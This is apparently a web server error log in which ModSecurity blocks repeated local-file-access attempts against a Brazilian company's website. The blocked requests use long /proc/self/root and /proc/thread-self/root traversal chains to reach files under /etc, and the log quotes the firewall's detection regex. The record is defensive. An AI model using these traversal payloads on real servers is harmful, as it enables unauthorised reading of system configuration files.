[Mon Mar 16 16:40:06.451175 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.241.46:46434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhclqTCbgAP5jq5Teg_2QAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:40:06.522207 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:57486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhclo6lpbStxTqkSkt9wgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:40:13.325458 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:57488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcnbABkC4fWIHEf8EGNQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:41:23.201700 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.228.16:41354] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhc46TCbgAP5jq5Teg_8gAAAss"]
[Mon Mar 16 16:41:27.145875 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:34292] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhc57ysWC90G-1nBrBXHQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:41:30.612044 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:37500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhc6rABkC4fWIHEf8EGVAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:41:54.072198 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.243.203:40166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdAkr9dMAiw-8KANNZvQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:41:54.359317 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:37508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdAs_BxrYCr4hPDw_9xQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:41:56.789567 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:36740] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdBEr9dMAiw-8KANNZwAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:41:58.111255 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:44008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdBlajLEzk2WiQ-10mZQAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:04.646840 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:54238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdDLysWC90G-1nBrBXLAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:06.997536 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:48442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdDqQpVkWug9HeOt9I0QAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:09.179060 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:44020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdEVajLEzk2WiQ-10mcwAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:42:10.503957 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:57006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdElajLEzk2WiQ-10mdgAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:42:11.715044 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:57016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdE0r9dMAiw-8KANNZwwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:42:12.754710 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:48444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdFFajLEzk2WiQ-10megAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:14.138168 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:57024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdFqTCbgAP5jq5Teg__AAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:42:17.218200 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:38864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdGf9ocpUE4ed4uDwFtgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:20.585449 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:38866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdHI6lpbStxTqkSkt95gAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:21.913690 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:55360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdHdSswJuvopo3lOhycwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:23.280179 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:55370] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdH1ajLEzk2WiQ-10mewAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:24.597110 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:55372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdIP9ocpUE4ed4uDwFvgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
